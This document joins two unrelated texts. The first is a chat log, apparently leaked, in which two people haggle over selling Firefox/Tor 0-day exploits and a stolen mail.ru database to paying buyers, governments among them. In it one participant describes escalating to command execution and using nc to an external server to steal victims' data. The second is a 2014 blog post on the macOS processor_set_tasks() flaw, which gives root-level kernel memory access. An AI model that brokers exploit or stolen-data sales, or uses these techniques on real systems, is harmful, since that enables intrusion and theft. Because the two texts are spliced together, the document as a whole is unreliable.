3505(22:03:13) _1nf3ct0r_@exploit.im: i send you
3506(22:03:14) symlink40: yes
3507(22:03:15) symlink40: I see
3508(22:03:26) symlink40: will be back in 2 horus
3509(22:03:29) symlink40: hours*
3510(2017-01-07 00:09:41) Attempting to refresh the private conversation with _1nf3ct0r_@exploit.im/15484058151483736501249055...
3511(00:18:00) _1nf3ct0r_@exploit.im has signed on.
3512(00:18:00) Successfully refreshed the unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with _1nf3ct0r_@exploit.im/2693421533148374827615185.
3513(00:18:09) _1nf3ct0r_@exploit.im: hi
3514(00:18:24) _1nf3ct0r_@exploit.im: so you bay or not ?
3515(00:18:30) symlink40: need to talk to you about something
3516(00:18:33) symlink40: yes im buying
3517(00:18:38) symlink40: just talked to my cashier
3518(00:18:42) symlink40: we need to confirm 1 thing
3519(00:18:51) _1nf3ct0r_@exploit.im: ?
3520(00:19:00) symlink40: this
3521(00:19:01) symlink40: https://twitter.com/isba_tech/status/807396996348678144
3522(00:19:16) symlink40: this company bought 2 exploits back in the days from osx.installs@exploit.im
3523(00:19:38) symlink40: when I mention your name he sent me to same link I sent where my other friend found your email where I contacted you
3524(00:19:59) symlink40: can you check the tweet ?
3525(00:21:30) _1nf3ct0r_@exploit.im: what do you want from me?
3526(00:21:36) symlink40: nothing
3527(00:21:41) symlink40: just making sure this not a scam
3528(00:21:52) symlink40: you provided 100% proof
3529(00:21:59) symlink40: but my cashier is mad at the tweet
3530(00:22:21) symlink40: and he refuse to make payment until you make a clear statement why this company says you cheater
3531(00:24:59) symlink40: Hello ?
3532(00:25:37) symlink40: I hope you can provide clear statement so we can finish mail.ru deal and move to future deals !!!
3533(00:25:39) _1nf3ct0r_@exploit.im: manager with whom I spoke on the company's hysterical fool there's a long story, I became ill and was gone did not appear in the network, it Panek spread came out of hospital I wrote it does not meet
3534(00:25:51) _1nf3ct0r_@exploit.im: I hammered on it and I'm not a crook you yourself exceeds me, I showed you everything that you asked
3535(00:27:24) symlink40: Yes . I fully understand because you shared 100% proof with me and I know you are not a scammer and I refuse to say that
3536, but this company said you took money and never replied
3537my cashier is the guy who has all money and he got scammed a lot of time trusting people with proof then they didn't reply
3538(00:27:42) symlink40: atm we don't wanna lost money because we need it to to build our project for 0day market
3539(00:28:52) _1nf3ct0r_@exploit.im: What do you want now ?
3540(00:29:27) symlink40: I just need clear statement on what happen to get my cashier to trust you
3541(00:29:54) symlink40: he also says that since you are an old member on exploit.in you could help US sell our browser 0days, to earn our trust
3542(00:30:10) symlink40: and I hope this company get in contact with me , so I can show them you are not a scammer
3543(00:34:26) symlink40: sorry if my words offend you
3544(00:34:30) symlink40: friend !
3545(00:36:50) _1nf3ct0r_@exploit.im: so you buy or not? and other matters then! I have already I'm starting to not trust you, you talk a lot and do low. if you want to come to work or do not waste my time
3546(00:36:58) _1nf3ct0r_@exploit.im/2693421533148374827615185 has ended his/her private conversation with you; you should do the same.
3547(00:36:58) _1nf3ct0r_@exploit.im has signed off.
3548(00:37:27) _1nf3ct0r_@exploit.im has signed on.
3549(00:37:37) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with _1nf3ct0r_@exploit.im/34876857091483749443209651 started.
3550(00:38:42) symlink40: U gone offline without letting me finish my talk .. i have payment ready just wanted to get a statment clear statment about what happend
3551cuz company claims u took 20k without giving exploit !
3552and i can't get scammed for 6500$
3553(00:39:23) symlink40: im not a kid or just a person on internet .. im 38 years old and I been sitting on the internet for 25 years s
3554(00:39:48) symlink40: so please understand what im trying to say and don't take it so serouis because I like to clear things
3555(00:40:02) symlink40: you yourself don't wanna get scammed even for 10$
3556(00:40:24) symlink40: even 6k.5 is not a big price but we don't like scammed deals as we need long relationship
3557(00:41:29) _1nf3ct0r_@exploit.im: what do you in the end when I was all show and prove to you fuck my brain
3558(00:42:07) symlink40: sorry to offend you but we need a clear statement . we are not a company and I only need to know what happened
3559(00:42:27) symlink40: example : imagine someone saying im a scammer and I ask you to give me shell before I pay >
3560(00:42:52) symlink40: you will be suspect about it and be afraid you will get scammed even I show proof of paying
3561(00:43:13) symlink40: I you don't like my talk is your bussiness but I like to clear things than just talk random crap!
3562(00:43:15) symlink40: thanks
3563(00:45:35) _1nf3ct0r_@exploit.im: ОК
3564(00:46:01) _1nf3ct0r_@exploit.im: offered his own version of the transaction
3565(00:46:12) symlink40: I hope you can tell me more what happen to get my cashier make payment fast ,, I don't like wasting time
3566(00:46:19) symlink40: as I need that mail.ru DB so fast
3567(00:46:25) symlink40: who offered ?
3568(00:49:46) _1nf3ct0r_@exploit.im: I will say one thing if you want to buy a safe option say I will review the transaction option that you suggested
3569(00:50:12) symlink40: what transaction
3570(00:50:14) symlink40: I don't anything
3571(00:50:32) symlink40: I only need to know what happened between you and isba tech (chinese company)
3572(00:50:45) symlink40: the guys posted tweets says you took 20k and gone
3573(00:50:55) symlink40: how the fuck they will pay 20k without assurance?
3574(00:52:43) _1nf3ct0r_@exploit.im: is a girl and not a guy and they just morons
3575(00:52:55) symlink40: what the hell
3576(00:52:56) symlink40: a girl
3577(00:52:59) symlink40: with money ?
3578(00:53:33) symlink40: they paid my friend with BTC back in days without even asking for details and they asked to upload source code of 0day on mediafire
3579(00:53:41) symlink40: and they comeback saying they need more exploits
3580(00:54:04) symlink40: can they buy our 0days ?
3581(00:56:28) _1nf3ct0r_@exploit.im: yes but i have other buyers
3582(00:56:49) symlink40: buyers who can pay good ?
3583(00:57:47) symlink40: lets keep mail.ru deal paused, I will talk to my cashier and get him to pay soon
3584i
3585(00:57:58) symlink40: other buyers who can pay good than isbatech do ?
3586(00:58:08) _1nf3ct0r_@exploit.im: 'll be honest I have a buyer who is willing to give 60K if it works
3587(00:58:20) symlink40: holy shit
3588(00:58:23) symlink40: that's a big price
3589(00:58:49) symlink40: can you get him to talk to use so we can Setup working DEMO on virtualmachines (PoC)
3590(00:59:23) _1nf3ct0r_@exploit.im: I need proof Video and detals
3591(00:59:31) symlink40: that tor browser day could be sold for more .. it needs a good coder so it can be fully function on the latest version of tor (sandboxed)
3592(01:00:09) symlink40: why always buyers ask for video proof ? when they know it can be faked with just a simple webpage !!!!
3593(01:00:21) _1nf3ct0r_@exploit.im: Firefox
3594RCE, sandbox escape
3595(01:00:29) symlink40: I will setup working live DEMO if buyer accept the price !!!
3596(01:00:49) symlink40: and do live proof on teamviewer or join.me or even buyer VM
3597(01:01:32) _1nf3ct0r_@exploit.im: OK
3598(01:01:37) _1nf3ct0r_@exploit.im: so
3599(01:01:50) symlink40: wait 1 min . please
3600(01:01:54) symlink40: phone call
3601(01:03:05) _1nf3ct0r_@exploit.im has gone away.
3602(01:05:51) symlink40: Back
3603(01:05:54) symlink40: you there friend ?
3604(01:06:32) _1nf3ct0r_@exploit.im is no longer away.
3605(01:06:40) _1nf3ct0r_@exploit.im: back
3606(01:07:06) symlink40: good to be back
3607(01:07:08) _1nf3ct0r_@exploit.im: how mach you wont for TOR ?
3608(01:07:17) symlink40: I sent you prices on gmail
3609(01:07:28) symlink40: 10 btc
3610(01:07:41) symlink40: it could worth more if the buyer has good coding skills
3611(01:08:12) symlink40: to re-write into dll library to get full permissions on browser
3612(01:08:25) symlink40: as OSX sucks at securing core browser context file sys
3613(01:08:42) symlink40: who is this 60k buyer ?
3614(01:09:08) _1nf3ct0r_@exploit.im: rusian gov
3615(01:09:29) symlink40: no
3616(01:09:33) symlink40: we don't need problems
3617(01:09:47) _1nf3ct0r_@exploit.im: I sell
3618(01:10:00) symlink40: no man govs are fucking bad
3619(01:10:11) symlink40: I don't wanna sell to them and get arrested
3620(01:10:24) symlink40: I sold to a lot of people and I refuse to sell to goverments
3621(01:10:29) _1nf3ct0r_@exploit.im: they do not know about you
3622(01:10:34) symlink40: even if they pay good money
3623(01:10:47) symlink40: and how this buyer will get to talk to me when he don't know me ?
3624(01:10:56) symlink40: we need a middle man
3625(01:11:41) symlink40: did you read the news lately .. US exposed a team of russian hackers who hacked into US elections systems and added bounty for exposing there locations,names,
3626(01:11:50) symlink40: last thing I wanna be is on that list
3627(01:12:27) _1nf3ct0r_@exploit.im: I can act as a mediator
3628(01:12:39) symlink40: middle man?
3629(01:12:51) _1nf3ct0r_@exploit.im: yes\
3630(01:13:24) symlink40: we need assurance first, how do we make sure they will pay or don't do anything to us when giving the the 0day exploit
3631(01:13:26) _1nf3ct0r_@exploit.im: ishbatech is chaina gov ))) you now ? ))))
3632(01:13:35) symlink40: no , I didn't know
3633(01:13:39) symlink40: fuck goverments
3634(01:14:00) symlink40: damn , I was gonna message isbatech, thanks for telling me they are china gov
3635(01:14:11) _1nf3ct0r_@exploit.im: ishibatech 100% gov organisation
3636(01:14:23) symlink40: that's why they have a lot of money
3637(01:14:34) symlink40: we need assurance
3638(01:14:51) symlink40: if something happens?
3639(01:15:50) _1nf3ct0r_@exploit.im: See how they work
3640(01:17:07) symlink40: man
3641(01:17:11) symlink40: we need assurance
3642(01:17:15) symlink40: you trust this buyer
3643(01:17:19) symlink40: ?
3644(01:17:38) symlink40: you just said he can pay 60k .. I don't 60k $ and get arrested or problems in real life
3645(01:17:52) symlink40: I have a wife and kids and a good job
3646(01:18:21) _1nf3ct0r_@exploit.im: need describe how the exploit
3647need video proof.
3648(01:18:37) symlink40: I sent you details
3649(01:18:39) symlink40: on gmail
3650(01:18:41) symlink40: did you check them
3651(01:18:45) symlink40: or should I resend ?
3652(01:18:55) _1nf3ct0r_@exploit.im: I'm constantly working with them
3653(01:19:07) symlink40: working this buyer ?
3654(01:19:55) _1nf3ct0r_@exploit.im: yes
3655(01:20:01) symlink40: check your gmail again, I will send other details in minutes
3656(01:20:01) _1nf3ct0r_@exploit.im: and with others too
3657(01:20:13) symlink40: gotta login to vps
3658(01:20:17) symlink40: ok good
3659(01:20:32) symlink40: but what's my assurance they will pay ? or make problem for us
3660(01:20:46) symlink40: also ask if they pay btc
3661(01:21:26) _1nf3ct0r_@exploit.im: yes BTC
3662(01:21:35) _1nf3ct0r_@exploit.im: only BTC
3663(01:22:33) _1nf3ct0r_@exploit.im: so mail.ru DB ?
3664(01:24:10) symlink40: yes
3665(01:24:17) symlink40: we only accept btc
3666(01:24:25) symlink40: I called cashier he still thinking about it
3667(01:24:42) symlink40: bro I don't wanna get in problems with this russian gov
3668(01:24:49) symlink40: even if they give us big money
3669(01:24:55) symlink40: money can't solve arrests
3670(01:26:39) _1nf3ct0r_@exploit.im: I can take and resell them. but I told you the truth as it is
3671(01:27:47) _1nf3ct0r_@exploit.im: let's make a deal first, and you will be convinced that I am not a cheater
3672(01:27:53) symlink40: yes I know
3673(01:27:58) symlink40: I know you are not a cheater
3674(01:28:11) symlink40: my cashier deal is mail.ru db and he got my money
3675(01:28:21) symlink40: firefox/tor 0day is my deal
3676(01:28:28) symlink40: you sure the buyer will pay ?
3677(01:28:46) symlink40: can you get him to talk on group chat
3678(01:29:25) symlink40: check
3679(01:29:25) symlink40: http://prntscr.com/dsgj7b
3680(01:29:28) _1nf3ct0r_@exploit.im: I can personally meet with them to make a deal and give you the money via BTC
3681(01:29:40) symlink40: I can escalate into runing commands
3682(01:30:01) symlink40: then nc to external IP/server for stealing data from victim
3683(01:30:11) symlink40: can you ask him
3684(01:30:24) symlink40: if he wanna buy the 3 0days or just firefox only without tor or flash ?
3685(01:30:43) symlink40: if he pays good price he can take them all at once
3686(01:30:47) symlink40: let me know when he reply
3687(01:31:00) symlink40: so we can setup Demo and give you 0day exploit source code
3688(01:31:03) symlink40: ok bro ?
3689(01:31:35) _1nf3ct0r_@exploit.im: OK
3690(01:31:45) symlink40: you can code in php ?
3691(01:31:52) _1nf3ct0r_@exploit.im: yes
3692(01:32:16) _1nf3ct0r_@exploit.im: I have a Team
3693(01:32:28) symlink40: need to parse array('requestheaders'=>array 1=1 2=2
3694(01:32:29) symlink40: ok
3695(01:32:34) symlink40: good will give you what I need later
3696(01:32:41) symlink40: the buyer is online ?
3697(01:32:44) _1nf3ct0r_@exploit.im: php, python, javascript, C++, ASM
3698(01:33:18) _1nf3ct0r_@exploit.im: no I call him today in phone
3699(01:33:26) symlink40: look here what I need to know
3700(01:33:33) symlink40: don't sending anything
3701(01:33:36) symlink40: and listen to me
3702(01:34:43) symlink40: I need to setup a fix price with buyer
3703ask if buyer accept paying via btc
3704assurance they we will get paid after we give him exploit source code
3705agree to not make us problems after the deal
3706agree to not mention my name or my info after deal is finished
3707(01:34:47) symlink40: that's all I need
3708(01:37:09) _1nf3ct0r_@exploit.im: I guarantee that he will not know about you all
3709(01:37:17) symlink40: im also adding new functions to the exploit
3710
3711use after free in HTML crafted webpage + use after updating offline browser cache ,, even victim patch the exploit will still work at core context of firefox
3712(01:37:23) symlink40: That's good ,
3713(01:37:43) symlink40: let me know when the buyer confirms this . so we can have a nice deal and celebrate
3714(01:38:28) _1nf3ct0r_@exploit.im: Payment will be in BTC
3715(01:38:50) symlink40: That's good
3716(01:39:06) symlink40: is getting late here , and I need to go to bed
3717(01:39:14) symlink40: what time you gonna be online tomorrow ?
3718(01:41:06) _1nf3ct0r_@exploit.im: my GMT +5
3719(01:41:27) symlink40: what county ?
3720(01:41:37) _1nf3ct0r_@exploit.im: what's your
3721(01:41:47) symlink40: france
3722(01:41:59) symlink40: is 2;40 am here
3723(01:42:07) symlink40: you ?
3724(01:42:36) _1nf3ct0r_@exploit.im: I have not slept
3725(01:42:46) symlink40: ok
3726(01:42:46) _1nf3ct0r_@exploit.im: 06:42
3727(01:43:24) symlink40: I will message on gmail tomorrow when im awake. and please make sure you ask buyer those stuff I sent so we can have a nice deal and get paid + deliver exploit
3728(01:43:43) _1nf3ct0r_@exploit.im: you have Telegram mesanger ?
3729(01:43:50) symlink40: no
3730(01:44:25) _1nf3ct0r_@exploit.im: send me all detales + new fix
3731(01:46:16) symlink40: yes
3732(01:46:29) symlink40: will update you tomorrow morning + new added functions to the exploit
3733(01:46:38) symlink40: make sure you ask buyer all things I sent
3734(01:47:02) symlink40: going to bed to get some sleep before my mind go off
3735(01:47:06) _1nf3ct0r_@exploit.im: OK
3736(01:47:07) symlink40: good night friend ,
3737(01:47:24) _1nf3ct0r_@exploit.im: good night
3738(01:47:31) _1nf3ct0r_@exploit.im/34876857091483749443209651 has ended his/her private conversation with you; you should do the same.
3739(01:47:32) _1nf3ct0r_@exploit.im has signed off.
3740
3741
3742
3743
3744
3745About the processor_set_tasks() access to kernel memory vulnerability
3746May 5, 2014Security
3747At BlackHat Asia 2014, Ming-chieh Pan and Sung-ting Tsai presented about Mac OS X Rootkits (paper and slides). They describe some very cool techniques to access kernel memory in different ways than the usual ones. The slides and paper aren’t very descriptive about all the techniques so this weekend I decided to give it a try and replicate the described vulnerability to access kernel memory.
3748The access to kernel task (process 0) was possible before Leopard (or was it fixed in Snow Leopard? too lazy to check it now!), by using the function task_for_pid(0). This would retrieve the task port for the kernel and then we could use the mach_vm_read/write functions to fool around with kernel memory. It was pretty cool but a giant hole, even if it required root access to be used. The task_for_pid() function now has the following code to deny access to the kernel task (from 10.9.0 XNU source code):

3749/*
3750 * Routine: task_for_pid
3751 * Purpose:
3752 * Get the task port for another "process", named by its
3753 * process ID on the same host as "target_task".
3754 *
3755 * Only permitted to privileged processes, or processes
3756 * with the same user ID.
3757 *
3758 * Note: if pid == 0, an error is return no matter who is calling.
3759 *
3760 * XXX This should be a BSD system call, not a Mach trap!!!
3761 */
3762kern_return_t
3763task_for_pid(
3764 struct task_for_pid_args *args)
3765{
3766...
3767 /* Always check if pid == 0 */
3768 if (pid == 0) {
3769 (void ) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
3770 AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
3771 return(KERN_FAILURE);
3772 }
3773...
3774}
3775So root or not, we can’t use this trick anymore to get the kernel task port. But Apple was so kind to leave a similar hole in other functions as the mentioned presentation shows. The function processor_set_tasks() lists all the tasks in the processor set. What is a processor set? Mac OS X and iOS Internals book describes it as “A processor set is a logically coupled group of processors and allows Mach to efficiently scale to SMP architectures by using the set as a container for related processorsâ€. Essentially a XNU abstraction to scale to multiprocessors/multicores architectures. The interesting bit out of this function is that it returns the task port for all the tasks in the processor set, which in practice should mean all processes running in the system. This includes the kernel task due to XNU design, where the kernel is just another task in the system.
3776The vulnerability is very easy to use! We just set all the necessary ports to use processor_set_tasks, calls this function, and get the kernel task port in the element zero of the returned task_array_t of processor_set_tasks. After having the task port we can use the mach_vm_read and mach_vm_write functions to read and write from kernel memory, like it’s done for userland processes. The first argument for those functions is the task port, so as long we have a valid port we can do whatever we want with the kernel memory or any other process in the system (technically all the processes in the task list but there’s a one to one mapping between tasks and BSD processes in OS X).
3777Also a very fun detail is that this same vulnerability was *perfectly* described in Mac OS X and iOS Internals book for a long time on page 387. A screenshot of that page follows:
3778
3779I totally missed the clue when I read it although my silly brain still remembered I read something about the processor sets in the book. The other funny detail about this is at the bottom of that page, where it says the vulnerability was fixed in iOS but left all this time in OS X (still unfixed in latest Mavericks update).
3780If you want to see it working you can check the checkidt util in Github repo. This is an updated version of an old port I did from a Phrack article three years ago. It tries to use this vulnerability to read from kernel memory before trying to use the /dev/kmem device (that needs to be manually configured in OS X). It is a very useful vulnerability to this kind of tools :-).
3781What’s the catch about all this? It still needs root access to work, which is not perfect from a rootkit point of view but also not a big obstacle (how many installers ask for admin privileges? too many!). Task_for_pid(0) was fixed and it also required root privileges to work.
3782This is/was a nice bug, let it rest in peace and be useful while it lasts ;-).
3783Have fun,
fG!